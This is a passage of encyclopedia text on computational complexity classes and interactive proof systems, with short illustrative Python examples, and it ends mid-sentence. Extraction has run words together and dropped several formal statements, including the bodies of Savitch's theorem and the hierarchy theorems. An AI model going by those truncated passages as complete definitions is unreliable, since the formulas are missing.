Reductions motivate the concept of a problem beinghardfor a complexity class. A problemX{\displaystyle X}is hard for a class of problemsCif every problem inCcan be polynomial-time reduced toX{\displaystyle X}. Thus no problem inCis harder thanX{\displaystyle X}, since an algorithm forX{\displaystyle X}allows us to solve any problem inCwith at most polynomial slowdown. Of particular importance, the set of problems that are hard forNPis called the set ofNP-hardproblems. If a problemX{\displaystyle X}is hard forCand is also inC, thenX{\displaystyle X}is said to becompleteforC. This means thatX{\displaystyle X}is the hardest problem inC(since there could be many problems that are equally hard, more preciselyX{\displaystyle X}is as hard as the hardest problems inC). Of particular importance is the class ofNP-completeproblems—the most difficult problems inNP. Because all problems inNPcan be polynomial-time reduced toNP-complete problems, finding anNP-complete problem that can be solved in polynomial time would mean thatP=NP. Savitch's theorem establishes the relationship between deterministic and nondetermistic space resources. It shows that if a nondeterministic Turing machine can solve a problem usingf(n){\displaystyle f(n)}space, then a deterministic Turing machine can solve the same problem inf(n)2{\displaystyle f(n)^{2}}space, i.e. in the square of the space. Formally, Savitch's theorem states that for anyf(n)>n{\displaystyle f(n)>n},[14] Important corollaries of Savitch's theorem are thatPSPACE=NPSPACE(since the square of a polynomial is still a polynomial) andEXPSPACE=NEXPSPACE(since the square of an exponential is still an exponential). These relationships answer fundamental questions about the power of nondeterminism compared to determinism. Specifically, Savitch's theorem shows that any problem that a nondeterministic Turing machine can solve in polynomial space, a deterministic Turing machine can also solve in polynomial space. Similarly, any problem that a nondeterministic Turing machine can solve in exponential space, a deterministic Turing machine can also solve in exponential space. By definition ofDTIME, it follows thatDTIME(nk1){\displaystyle {\mathsf {DTIME}}(n^{k_{1}})}is contained inDTIME(nk2){\displaystyle {\mathsf {DTIME}}(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}, sinceO(nk1)⊆O(nk2){\displaystyle O(n^{k_{1}})\subseteq O(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}. However, this definition gives no indication of whether this inclusion is strict. For time and space requirements, the conditions under which the inclusion is strict are given by the time and space hierarchy theorems, respectively. They are called hierarchy theorems because they induce a proper hierarchy on the classes defined by constraining the respective resources. The hierarchy theorems enable one to make quantitative statements about how much more additional time or space is needed in order to increase the number of problems that can be solved. Thetime hierarchy theoremstates that Thespace hierarchy theoremstates that The time and space hierarchy theorems form the basis for most separation results of complexity classes. For instance, the time hierarchy theorem establishes thatPis strictly contained inEXPTIME, and the space hierarchy theorem establishes thatLis strictly contained inPSPACE. While deterministic and non-deterministicTuring machinesare the most commonly used models of computation, many complexity classes are defined in terms of other computational models. 
In particular, These are explained in greater detail below. A number of important complexity classes are defined using theprobabilistic Turing machine, a variant of theTuring machinethat can toss random coins. These classes help to better describe the complexity ofrandomized algorithms. A probabilistic Turing machine is similar to a deterministic Turing machine, except rather than following a single transition function (a set of rules for how to proceed at each step of the computation) it probabilistically selects between multiple transition functions at each step. The standard definition of a probabilistic Turing machine specifies two transition functions, so that the selection of transition function at each step resembles a coin flip. The randomness introduced at each step of the computation introduces the potential for error; that is, strings that the Turing machine is meant to accept may on some occasions be rejected and strings that the Turing machine is meant to reject may on some occasions be accepted. As a result, the complexity classes based on the probabilistic Turing machine are defined in large part around the amount of error that is allowed. Formally, they are defined using an error probabilityϵ{\displaystyle \epsilon }. A probabilistic Turing machineM{\displaystyle M}is said to recognize a languageL{\displaystyle L}with error probabilityϵ{\displaystyle \epsilon }if: The fundamental randomized time complexity classes areZPP,RP,co-RP,BPP, andPP. The strictest class isZPP(zero-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability 0. Intuitively, this is the strictest class of probabilistic problems because it demandsno error whatsoever. A slightly looser class isRP(randomized polynomial time), which maintains no error for strings not in the language but allows bounded error for strings in the language. More formally, a language is inRPif there is a probabilistic polynomial-time Turing machineM{\displaystyle M}such that if a string is not in the language thenM{\displaystyle M}always rejects and if a string is in the language thenM{\displaystyle M}accepts with a probability at least 1/2. The classco-RPis similarly defined except the roles are flipped: error is not allowed for strings in the language but is allowed for strings not in the language. Taken together, the classesRPandco-RPencompass all of the problems that can be solved by probabilistic Turing machines withone-sided error. Loosening the error requirements further to allow fortwo-sided erroryields the classBPP(bounded-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability less than 1/3 (for both strings in the language and not in the language).BPPis the most practically relevant of the probabilistic complexity classes—problems inBPPhave efficientrandomized algorithmsthat can be run quickly on real computers.BPPis also at the center of the important unsolved problem in computer science over whetherP=BPP, which if true would mean that randomness does not increase the computational power of computers, i.e. any probabilistic Turing machine could be simulated by a deterministic Turing machine with at most polynomial slowdown. 
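A classic concrete example of a polynomial-time randomized algorithm with bounded, one-sided error is Freivalds' check for matrix products ("does AB = C?"): it never rejects a correct product, and it catches an incorrect one with probability at least 1/2 per trial, so repeating the trial drives the error probability down exponentially. The pure-Python sketch below is illustrative only.

```python
import random

def matvec(M, x):
    return [sum(M[i][j] * x[j] for j in range(len(x))) for i in range(len(M))]

def freivalds(A, B, C, trials=20):
    """Randomized check of 'A*B == C' in O(trials * n^2) arithmetic: never wrong
    when AB = C, and wrong with probability at most 2**-trials otherwise."""
    n = len(A)
    for _ in range(trials):
        r = [random.randint(0, 1) for _ in range(n)]
        if matvec(A, matvec(B, r)) != matvec(C, r):   # compare A(Br) with Cr
            return False          # definitely AB != C
    return True                   # probably AB = C

A = [[1, 2], [3, 4]]
B = [[5, 6], [7, 8]]
C_good = [[19, 22], [43, 50]]
C_bad = [[19, 22], [43, 51]]
print(freivalds(A, B, C_good), freivalds(A, B, C_bad))   # almost surely: True False
```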
The broadest class of efficiently-solvable probabilistic problems isPP(probabilistic polynomial time), the set of languages solvable by a probabilistic Turing machine in polynomial time with an error probability of less than 1/2 for all strings. ZPP,RPandco-RPare all subsets ofBPP, which in turn is a subset ofPP. The reason for this is intuitive: the classes allowing zero error and only one-sided error are all contained within the class that allows two-sided error, andPPsimply relaxes the error probability ofBPP.ZPPrelates toRPandco-RPin the following way:ZPP=RP∩co-RP{\displaystyle {\textsf {ZPP}}={\textsf {RP}}\cap {\textsf {co-RP}}}. That is,ZPPconsists exactly of those problems that are in bothRPandco-RP. Intuitively, this follows from the fact thatRPandco-RPallow only one-sided error:co-RPdoes not allow error for strings in the language andRPdoes not allow error for strings not in the language. Hence, if a problem is in bothRPandco-RP, then there must be no error for strings both inandnot in the language (i.e. no error whatsoever), which is exactly the definition ofZPP. Important randomized space complexity classes includeBPL,RL, andRLP. A number of complexity classes are defined usinginteractive proof systems. Interactive proofs generalize the proofs definition of the complexity classNPand yield insights intocryptography,approximation algorithms, andformal verification. Interactive proof systems areabstract machinesthat model computation as the exchange of messages between two parties: a proverP{\displaystyle P}and a verifierV{\displaystyle V}. The parties interact by exchanging messages, and an input string is accepted by the system if the verifier decides to accept the input on the basis of the messages it has received from the prover. The proverP{\displaystyle P}has unlimited computational power while the verifier has bounded computational power (the standard definition of interactive proof systems defines the verifier to be polynomially-time bounded). The prover, however, is untrustworthy (this prevents all languages from being trivially recognized by the proof system by having the computationally unbounded prover solve for whether a string is in a language and then sending a trustworthy "YES" or "NO" to the verifier), so the verifier must conduct an "interrogation" of the prover by "asking it" successive rounds of questions, accepting only if it develops a high degree of confidence that the string is in the language.[15] The classNPis a simple proof system in which the verifier is restricted to being a deterministic polynomial-timeTuring machineand the procedure is restricted to one round (that is, the prover sends only a single, full proof—typically referred to as thecertificate—to the verifier). Put another way, in the definition of the classNP(the set of decision problems for which the problem instances, when the answer is "YES", have proofs verifiable in polynomial time by a deterministic Turing machine) is a proof system in which the proof is constructed by an unmentioned prover and the deterministic Turing machine is the verifier. For this reason,NPcan also be calleddIP(deterministic interactive proof), though it is rarely referred to as such. It turns out thatNPcaptures the full power of interactive proof systems with deterministic (polynomial-time) verifiers because it can be shown that for any proof system with a deterministic verifier it is never necessary to need more than a single round of messaging between the prover and the verifier. 
Interactive proof systems that provide greater computational power over standard complexity classes thus require probabilistic verifiers, which means that the verifier's questions to the prover are computed using probabilistic algorithms. As noted in the section above on randomized computation, probabilistic algorithms introduce error into the system, so complexity classes based on probabilistic proof systems are defined in terms of an error probability ε. The most general complexity class arising out of this characterization is the class IP (interactive polynomial time), which is the class of all problems solvable by an interactive proof system (P, V), where V is probabilistic polynomial-time and the proof system satisfies two properties for a language L in IP: (completeness) if a string w is in L, then the honest prover can make the verifier accept w with probability at least 2/3; and (soundness) if w is not in L, then no prover can make the verifier accept w with probability greater than 1/3. An important feature of IP is that it equals PSPACE. In other words, any problem that can be solved by a polynomial-time interactive proof system can also be solved by a deterministic Turing machine with polynomial space resources, and vice versa. A modification of the protocol for IP produces another important complexity class: AM (Arthur–Merlin protocol). In the definition of interactive proof systems used by IP, the prover was not able to see the coins utilized by the verifier in its probabilistic computation; it was only able to see the messages that the verifier produced with these coins. For this reason, the coins are called private random coins. The interactive proof system can be constrained so that the coins used by the verifier are public random coins; that is, the prover is able to see the coins. Formally, AM is defined as the class of languages with an interactive proof in which the verifier sends a random string to the prover, the prover responds with a message, and the verifier either accepts or rejects by applying a deterministic polynomial-time function to the message from the prover. AM can be generalized to AM[k], where k is the number of messages exchanged (so in the generalized form the standard AM defined above is AM[2]). However, it is the case that for all k ≥ 2, AM[k] = AM[2]. It is also the case that AM[k] ⊆ IP[k]. Other complexity classes defined using interactive proof systems include MIP (multiprover interactive polynomial time) and QIP (quantum interactive polynomial time). An alternative model of computation to the Turing machine is the Boolean circuit, a simplified model of the digital circuits used in modern computers. Not only does this model provide an intuitive connection between computation in theory and computation in practice, but it is also a natural model for non-uniform computation (computation in which different input sizes within the same problem use different algorithms). Formally, a Boolean circuit C is a directed acyclic graph in which edges represent wires (which carry the bit values 0 and 1), the input bits are represented by source vertices (vertices with no incoming edges), and all non-source vertices represent logic gates (generally the AND, OR, and NOT gates). One logic gate is designated the output gate, and represents the end of the computation.
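Concretely, a Boolean circuit can be stored as a labelled directed acyclic graph and evaluated gate by gate. The Python sketch below (an illustrative encoding; the gate names and dictionary format are chosen here purely for readability) evaluates such a circuit on a given input; the example circuit computes the XOR of two bits and would be the n = 2 member of a circuit family of the kind described next.

```python
from typing import Dict, Tuple

# A gate is ("INPUT", index), ("NOT", a), ("AND", a, b) or ("OR", a, b),
# where a and b name gates that appear earlier in the DAG.
Circuit = Dict[str, Tuple]

def evaluate(circuit: Circuit, output: str, bits: Tuple[int, ...]) -> int:
    """Evaluate the designated output gate on the given input bits."""
    memo = {}
    def val(g):
        if g not in memo:
            kind, *args = circuit[g]
            if kind == "INPUT":
                memo[g] = bits[args[0]]
            elif kind == "NOT":
                memo[g] = 1 - val(args[0])
            elif kind == "AND":
                memo[g] = val(args[0]) & val(args[1])
            else:  # "OR"
                memo[g] = val(args[0]) | val(args[1])
        return memo[g]
    return val(output)

# A circuit on 2 input bits computing XOR; its size is the number of gates (7).
xor2 = {
    "x0": ("INPUT", 0), "x1": ("INPUT", 1),
    "n0": ("NOT", "x0"), "n1": ("NOT", "x1"),
    "a":  ("AND", "x0", "n1"), "b": ("AND", "n0", "x1"),
    "out": ("OR", "a", "b"),
}
print([evaluate(xor2, "out", (i, j)) for i in (0, 1) for j in (0, 1)])  # [0, 1, 1, 0]
```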
The input/output behavior of a circuitC{\displaystyle C}withn{\displaystyle n}input variables is represented by theBoolean functionfC:{0,1}n→{0,1}{\displaystyle f_{C}:\{0,1\}^{n}\to \{0,1\}}; for example, on input bitsx1,x2,...,xn{\displaystyle x_{1},x_{2},...,x_{n}}, the output bitb{\displaystyle b}of the circuit is represented mathematically asb=fC(x1,x2,...,xn){\displaystyle b=f_{C}(x_{1},x_{2},...,x_{n})}. The circuitC{\displaystyle C}is said tocomputethe Boolean functionfC{\displaystyle f_{C}}. Any particular circuit has a fixed number of input vertices, so it can only act on inputs of that size.Languages(the formal representations ofdecision problems), however, contain strings of differing lengths, so languages cannot be fully captured by a single circuit (this contrasts with the Turing machine model, in which a language is fully described by a single Turing machine that can act on any input size). A language is thus represented by acircuit family. A circuit family is an infinite list of circuits(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}, whereCn{\displaystyle C_{n}}is a circuit withn{\displaystyle n}input variables. A circuit family is said to decide a languageL{\displaystyle L}if, for every stringw{\displaystyle w},w{\displaystyle w}is in the languageL{\displaystyle L}if and only ifCn(w)=1{\displaystyle C_{n}(w)=1}, wheren{\displaystyle n}is the length ofw{\displaystyle w}. In other words, a stringw{\displaystyle w}of sizen{\displaystyle n}is in the language represented by the circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}if the circuitCn{\displaystyle C_{n}}(the circuit with the same number of input vertices as the number of bits inw{\displaystyle w}) evaluates to 1 whenw{\displaystyle w}is its input. While complexity classes defined using Turing machines are described in terms oftime complexity, circuit complexity classes are defined in terms of circuit size — the number of vertices in the circuit. The size complexity of a circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}is the functionf:N→N{\displaystyle f:\mathbb {N} \to \mathbb {N} }, wheref(n){\displaystyle f(n)}is the circuit size ofCn{\displaystyle C_{n}}. The familiar function classes follow naturally from this; for example, a polynomial-size circuit family is one such that the functionf{\displaystyle f}is apolynomial. The complexity classP/polyis the set of languages that are decidable by polynomial-size circuit families. It turns out that there is a natural connection between circuit complexity and time complexity. Intuitively, a language with small time complexity (that is, requires relatively few sequential operations on a Turing machine), also has a small circuit complexity (that is, requires relatively few Boolean operations). Formally, it can be shown that if a language is inDTIME(t(n)){\displaystyle {\mathsf {DTIME}}(t(n))}, wheret{\displaystyle t}is a functiont:N→N{\displaystyle t:\mathbb {N} \to \mathbb {N} }, then it has circuit complexityO(t2(n)){\displaystyle O(t^{2}(n))}.[16]It follows directly from this fact thatP⊂P/poly{\displaystyle {\mathsf {\color {Blue}P}}\subset {\textsf {P/poly}}}. In other words, any problem that can be solved in polynomial time by a deterministic Turing machine can also be solved by a polynomial-size circuit family. It is further the case that the inclusion is proper, i.e.P⊊P/poly{\displaystyle {\textsf {P}}\subsetneq {\textsf {P/poly}}}(for example, there are someundecidable problemsthat are inP/poly). 
P/polyhas a number of properties that make it highly useful in the study of the relationships between complexity classes. In particular, it is helpful in investigating problems related toPversusNP. For example, if there is any language inNPthat is not inP/poly, thenP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[17]P/polyis also helpful in investigating properties of thepolynomial hierarchy. For example, ifNP⊆P/poly, thenPHcollapses toΣ2P{\displaystyle \Sigma _{2}^{\mathsf {P}}}. A full description of the relations betweenP/polyand other complexity classes is available at "Importance of P/poly".P/polyis also helpful in the general study of the properties ofTuring machines, as the class can be equivalently defined as the class of languages recognized by a polynomial-time Turing machine with a polynomial-boundedadvice function. Two subclasses ofP/polythat have interesting properties in their own right areNCandAC. These classes are defined not only in terms of their circuit size but also in terms of theirdepth. The depth of a circuit is the length of the longestdirected pathfrom an input node to the output node. The classNCis the set of languages that can be solved by circuit families that are restricted not only to having polynomial-size but also to having polylogarithmic depth. The classACis defined similarly toNC, however gates are allowed to have unbounded fan-in (that is, the AND and OR gates can be applied to more than two bits).NCis a notable class because it can be equivalently defined as the class of languages that have efficientparallel algorithms. The classesBQPandQMA, which are of key importance inquantum information science, are defined usingquantum Turing machines. While most complexity classes studied by computer scientists are sets ofdecision problems, there are also a number of complexity classes defined in terms of other types of problems. In particular, there are complexity classes consisting ofcounting problems,function problems, andpromise problems. These are explained in greater detail below. Acounting problemasks not onlywhethera solution exists (as with adecision problem), but askshow manysolutions exist.[18]For example, the decision problemCYCLE{\displaystyle {\texttt {CYCLE}}}askswhethera particular graphG{\displaystyle G}has asimple cycle(the answer is a simple yes/no); the corresponding counting problem#CYCLE{\displaystyle \#{\texttt {CYCLE}}}(pronounced "sharp cycle") askshow manysimple cyclesG{\displaystyle G}has.[19]The output to a counting problem is thus a number, in contrast to the output for a decision problem, which is a simple yes/no (or accept/reject, 0/1, or other equivalent scheme).[20] Thus, whereas decision problems are represented mathematically asformal languages, counting problems are represented mathematically asfunctions: a counting problem is formalized as the functionf:{0,1}∗→N{\displaystyle f:\{0,1\}^{*}\to \mathbb {N} }such that for every inputw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}},f(w){\displaystyle f(w)}is the number of solutions. For example, in the#CYCLE{\displaystyle \#{\texttt {CYCLE}}}problem, the input is a graphG∈{0,1}∗{\displaystyle G\in \{0,1\}^{*}}(a graph represented as a string ofbits) andf(G){\displaystyle f(G)}is the number of simple cycles inG{\displaystyle G}. 
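The difference between the two kinds of question is visible directly in code. The brute-force Python sketch below (illustrative only and exponential-time; the decision problem CYCLE is in fact solvable in polynomial time by depth-first search) enumerates the simple cycles of a small undirected graph, so #CYCLE returns a number while CYCLE merely asks whether that number is nonzero.

```python
from itertools import combinations, permutations

def count_simple_cycles(vertices, edges):
    """Brute-force #CYCLE for a small undirected graph."""
    adj = {v: set() for v in vertices}
    for u, v in edges:
        adj[u].add(v)
        adj[v].add(u)
    seen = set()
    for k in range(3, len(vertices) + 1):
        for subset in combinations(vertices, k):
            for order in permutations(subset):
                closed = all(order[i + 1] in adj[order[i]] for i in range(k - 1)) \
                         and order[0] in adj[order[-1]]
                if closed:
                    # canonical form: ignore the rotation and direction of the cycle
                    i = order.index(min(order))
                    rot = order[i:] + order[:i]
                    canon = min(rot, (rot[0],) + tuple(reversed(rot[1:])))
                    seen.add(canon)
    return len(seen)

def has_cycle(vertices, edges):
    """The decision problem CYCLE only asks whether the count is nonzero."""
    return count_simple_cycles(vertices, edges) > 0

square = ["a", "b", "c", "d"]
sq_edges = [("a", "b"), ("b", "c"), ("c", "d"), ("d", "a"), ("a", "c")]
print(count_simple_cycles(square, sq_edges))  # 3: the cycles abc, acd and abcd
print(has_cycle(square, sq_edges))            # True
```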
Counting problems arise in a number of fields, including statistical estimation, statistical physics, network design, and economics.[21] #P (pronounced "sharp P") is an important class of counting problems that can be thought of as the counting version of NP.[22] The connection to NP arises from the fact that the number of solutions to a problem equals the number of accepting branches in a nondeterministic Turing machine's computation tree. #P is thus formally defined as follows: #P is the set of functions f: {0,1}* → N for which there is a polynomial-time nondeterministic Turing machine M such that, for every input w, f(w) equals the number of accepting branches in M's computation tree on w. And just as NP can be defined both in terms of nondeterminism and in terms of a verifier (i.e. as an interactive proof system), so too can #P be equivalently defined in terms of a verifier. Recall that a decision problem is in NP if there exists a polynomial-time checkable certificate to a given problem instance; that is, NP asks whether there exists a proof of membership (a certificate) for the input that can be checked for correctness in polynomial time. The class #P asks how many such certificates exist.[22] In this context, #P is defined as follows: #P is the set of functions f: {0,1}* → N for which there is a polynomial-time verifier V and a polynomial p such that, for every input w, f(w) equals the number of certificates c with |c| ≤ p(|w|) and V(w, c) = 1. Counting problems are a subset of a broader class of problems called function problems. A function problem is a type of problem in which the values of a function f: A → B are computed. Formally, a function problem f is defined as a relation R over strings of an arbitrary alphabet Σ, that is, R ⊆ Σ* × Σ*. An algorithm solves f if for every input x such that there exists a y satisfying (x, y) ∈ R, the algorithm produces one such y. This is just another way of saying that f is a function and the algorithm solves f(x) for all x ∈ Σ*. An important function complexity class is FP, the class of efficiently solvable functions.[23] More specifically, FP is the set of function problems that can be solved by a deterministic Turing machine in polynomial time.[23] FP can be thought of as the function problem equivalent of P. Importantly, FP provides some insight into both counting problems and P versus NP. If #P = FP, then the functions that determine the number of certificates for problems in NP are efficiently solvable. And since computing the number of certificates is at least as hard as determining whether a certificate exists, it must follow that if #P = FP then P = NP (it is not known whether this holds in the reverse, i.e. whether P = NP implies #P = FP).[23] Just as FP is the function problem equivalent of P, FNP is the function problem equivalent of NP. Importantly, FP = FNP if and only if P = NP.[24] Promise problems are a generalization of decision problems in which the input to a problem is guaranteed ("promised") to be from a particular subset of all possible inputs. Recall that with a decision problem L ⊆ {0,1}*, an algorithm M for L must act (correctly) on every w ∈ {0,1}*. A promise problem loosens the input requirement on M by restricting the input to some subset of {0,1}*. Specifically, a promise problem is defined as a pair of non-intersecting sets (Π_ACCEPT, Π_REJECT), where:[25] Π_ACCEPT is the set of inputs for which the algorithm must accept, and Π_REJECT is the set of inputs for which it must reject. The input to an algorithm M for a promise problem (Π_ACCEPT, Π_REJECT) is thus Π_ACCEPT ∪ Π_REJECT, which is called the promise.
Strings inΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}are said tosatisfy the promise.[25]By definition,ΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}must be disjoint, i.e.ΠACCEPT∩ΠREJECT=∅{\displaystyle \Pi _{\text{ACCEPT}}\cap \Pi _{\text{REJECT}}=\emptyset }. Within this formulation, it can be seen that decision problems are just the subset of promise problems with the trivial promiseΠACCEPT∪ΠREJECT={0,1}∗{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}=\{0,1\}^{*}}. With decision problems it is thus simpler to simply define the problem as onlyΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}(withΠREJECT{\displaystyle \Pi _{\text{REJECT}}}implicitly being{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}), which throughout this page is denotedL{\displaystyle L}to emphasize thatΠACCEPT=L{\displaystyle \Pi _{\text{ACCEPT}}=L}is aformal language. Promise problems make for a more natural formulation of many computational problems. For instance, a computational problem could be something like "given aplanar graph, determine whether or not..."[26]This is often stated as a decision problem, where it is assumed that there is some translation schema that takeseverystrings∈{0,1}∗{\displaystyle s\in \{0,1\}^{*}}to a planar graph. However, it is more straightforward to define this as a promise problem in which the input is promised to be a planar graph. Promise problems provide an alternate definition for standard complexity classes of decision problems.P, for instance, can be defined as a promise problem:[27] Classes of decision problems—that is, classes of problems defined as formal languages—thus translate naturally to promise problems, where a languageL{\displaystyle L}in the class is simplyL=ΠACCEPT{\displaystyle L=\Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}is implicitly{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}. Formulating many basic complexity classes likePas promise problems provides little additional insight into their nature. However, there are some complexity classes for which formulating them as promise problems have been useful to computer scientists. Promise problems have, for instance, played a key role in the study ofSZK(statistical zero-knowledge).[28] The following table shows some of the classes of problems that are considered in complexity theory. If classXis a strictsubsetofY, thenXis shown belowYwith a dark line connecting them. IfXis a subset, but it is unknown whether they are equal sets, then the line is lighter and dotted. Technically, the breakdown into decidable and undecidable pertains more to the study ofcomputability theory, but is useful for putting the complexity classes in perspective.
https://en.wikipedia.org/wiki/Complexity_class#Complexity_classes
In computational complexity theory, an interactive proof system is an abstract machine that models computation as the exchange of messages between two parties: a prover and a verifier. The parties interact by exchanging messages in order to ascertain whether a given string belongs to a language or not. The prover is assumed to possess unlimited computational resources but cannot be trusted, while the verifier has bounded computation power but is assumed to be always honest. Messages are sent between the verifier and prover until the verifier has an answer to the problem and has "convinced" itself that it is correct. All interactive proof systems have two requirements: completeness, meaning that if the string is in the language then an honest prover can convince the honest verifier of this fact with high probability; and soundness, meaning that if the string is not in the language then no prover can convince the verifier otherwise, except with small probability. The specific nature of the system, and so the complexity class of languages it can recognize, depends on what sort of bounds are put on the verifier, as well as what abilities it is given; for example, most interactive proof systems depend critically on the verifier's ability to make random choices. It also depends on the nature of the messages exchanged: how many and what they can contain. Interactive proof systems have been found to have some important implications for traditional complexity classes defined using only one machine. The main complexity classes describing interactive proof systems are AM and IP. Every interactive proof system defines a formal language of strings L. Soundness of the proof system refers to the property that no prover can make the verifier accept for the wrong statement y ∉ L except with some small probability. The upper bound of this probability is referred to as the soundness error of a proof system. More formally, for every prover P̃ and every y ∉ L, the probability that the verifier accepts y after interacting with P̃ is at most ε, for some ε ≪ 1. As long as the soundness error is bounded by a polynomial fraction of the potential running time of the verifier (i.e. ε ≤ 1/poly(|y|)), it is always possible to amplify soundness until the soundness error becomes a negligible function relative to the running time of the verifier. This is achieved by repeating the proof and accepting only if all proofs verify. After ℓ repetitions, a soundness error ε will be reduced to ε^ℓ.[1] The complexity class NP may be viewed as a very simple proof system. In this system, the verifier is a deterministic, polynomial-time machine (a P machine). The protocol is: the prover sends the verifier a single proof certificate of polynomial size, and the verifier checks it deterministically in polynomial time, accepting if and only if the check succeeds. In the case where a valid proof certificate exists, the prover is always able to make the verifier accept by giving it that certificate. In the case where there is no valid proof certificate, however, the input is not in the language, and no prover, however malicious it is, can convince the verifier otherwise, because any proof certificate will be rejected. Although NP may be viewed as using interaction, it was not until 1985 that the concept of computation through interaction was conceived (in the context of complexity theory) by two independent groups of researchers. One approach, by László Babai, who published "Trading group theory for randomness",[2] defined the Arthur–Merlin (AM) class hierarchy. In this presentation, Arthur (the verifier) is a probabilistic, polynomial-time machine, while Merlin (the prover) has unbounded resources. The class MA in particular is a simple generalization of the NP interaction above in which the verifier is probabilistic instead of deterministic.
Also, instead of requiring that the verifier always accept valid certificates and reject invalid certificates, it is more lenient: if a string is in the language, the verifier must accept some valid certificate with probability at least 2/3, and if a string is not in the language, the verifier may accept any purported certificate with probability at most 1/3. This machine is potentially more powerful than an ordinary NP interaction protocol, and the certificates are no less practical to verify, since BPP algorithms are considered as abstracting practical computation (see BPP). In a public coin protocol, the random choices made by the verifier are made public. They remain private in a private coin protocol. In the same conference where Babai defined his proof system for MA, Shafi Goldwasser, Silvio Micali and Charles Rackoff[3] published a paper defining the interactive proof system IP[f(n)]. This has the same machines as the MA protocol, except that f(n) rounds are allowed for an input of size n. In each round, the verifier performs computation and passes a message to the prover, and the prover performs computation and passes information back to the verifier. At the end the verifier must make its decision. For example, in an IP[3] protocol, the sequence would be VPVPVPV, where V is a verifier turn and P is a prover turn. In Arthur–Merlin protocols, Babai defined a similar class AM[f(n)] which allowed f(n) rounds, but he put one extra condition on the machine: the verifier must show the prover all the random bits it uses in its computation. The result is that the verifier cannot "hide" anything from the prover, because the prover is powerful enough to simulate everything the verifier does if it knows what random bits it used. This is called a public coin protocol, because the random bits ("coin flips") are visible to both machines. The IP approach is called a private coin protocol by contrast. The essential problem with public coins is that if the prover wishes to maliciously convince the verifier to accept a string which is not in the language, it seems like the verifier might be able to thwart its plans if it can hide its internal state from it. This was a primary motivation in defining the IP proof systems. In 1986, Goldwasser and Sipser[4] showed, perhaps surprisingly, that the verifier's ability to hide coin flips from the prover does it little good after all, in that an Arthur–Merlin public-coin protocol with only two more rounds can recognize all the same languages. The result is that public-coin and private-coin protocols are roughly equivalent. In fact, as Babai showed in 1988, AM[k] = AM for all constant k, so the IP[k] have no advantage over AM.[5] To demonstrate the power of these classes, consider the graph isomorphism problem, the problem of determining whether it is possible to permute the vertices of one graph so that it is identical to another graph. This problem is in NP, since the proof certificate is the permutation which makes the graphs equal. It turns out that the complement of the graph isomorphism problem, a co-NP problem not known to be in NP, has an AM algorithm, and the best way to see it is via a private-coins algorithm.[6] Private coins may not be helpful, but more rounds of interaction are helpful. If we allow the probabilistic verifier machine and the all-powerful prover to interact for a polynomial number of rounds, we get the class of problems called IP.
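The private-coin protocol behind that result is simple enough to simulate. In the Python sketch below (an illustrative simulation in which the unbounded prover is played by a brute-force isomorphism search), the verifier secretly picks one of the two graphs, sends a randomly relabelled copy, and accepts only if the prover names the graph it started from; if the graphs are not isomorphic an honest prover always succeeds, whereas if they were isomorphic any prover could do no better than guessing in each round.

```python
import random
from itertools import permutations

def permute(graph, relabel):
    """Apply a vertex relabelling to a graph given as a frozenset of 2-element frozensets."""
    return frozenset(frozenset(relabel[v] for v in e) for e in graph)

def isomorphic(g, h, n):
    """Brute-force isomorphism test: fine for the computationally unbounded prover."""
    return any(permute(g, dict(enumerate(p))) == h for p in permutations(range(n)))

def gni_round(g0, g1, n):
    """One round of the private-coin protocol for graph NON-isomorphism."""
    b = random.randrange(2)                       # verifier's private coin
    relabel = list(range(n))
    random.shuffle(relabel)
    challenge = permute((g0, g1)[b], dict(enumerate(relabel)))
    # Honest prover: decide which of the two graphs the challenge came from.
    answer = 0 if isomorphic(challenge, g0, n) else 1
    return answer == b                            # verifier accepts iff the answer matches

def graph(edges):
    return frozenset(frozenset(e) for e in edges)

n = 4
path = graph([(0, 1), (1, 2), (2, 3)])            # a path on 4 vertices
star = graph([(0, 1), (0, 2), (0, 3)])            # a star: not isomorphic to the path
print(all(gni_round(path, star, n) for _ in range(20)))  # True: the verifier is always convinced
```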
In 1992, Adi Shamir revealed in one of the central results of complexity theory that IP equals PSPACE, the class of problems solvable by an ordinary deterministic Turing machine in polynomial space.[7] If we allow the elements of the system to use quantum computation, the system is called a quantum interactive proof system, and the corresponding complexity class is called QIP.[8] A series of results culminated in a 2010 breakthrough that QIP = PSPACE.[9][10] Not only can interactive proof systems solve problems not believed to be in NP, but under assumptions about the existence of one-way functions, a prover can convince the verifier of the solution without ever giving the verifier information about the solution. This is important when the verifier cannot be trusted with the full solution. At first it seems impossible that the verifier could be convinced that there is a solution when the verifier has not seen a certificate, but such proofs, known as zero-knowledge proofs, are in fact believed to exist for all problems in NP and are valuable in cryptography. Zero-knowledge proofs were first mentioned in the original 1985 paper on IP by Goldwasser, Micali and Rackoff for specific number-theoretic languages. The full extent of their power, however, was shown by Oded Goldreich, Silvio Micali and Avi Wigderson,[6] who exhibited zero-knowledge proofs for all of NP, and this was first extended by Russell Impagliazzo and Moti Yung to all of IP.[11] One goal of IP's designers was to create the most powerful possible interactive proof system, and at first it seems like it cannot be made more powerful without making the verifier more powerful and so impractical. Goldwasser et al. overcame this in their 1988 "Multi prover interactive proofs: How to remove intractability assumptions", which defines a variant of IP called MIP in which there are two independent provers.[12] The two provers cannot communicate once the verifier has begun sending messages to them. Just as it is easier to tell if a criminal is lying if he and 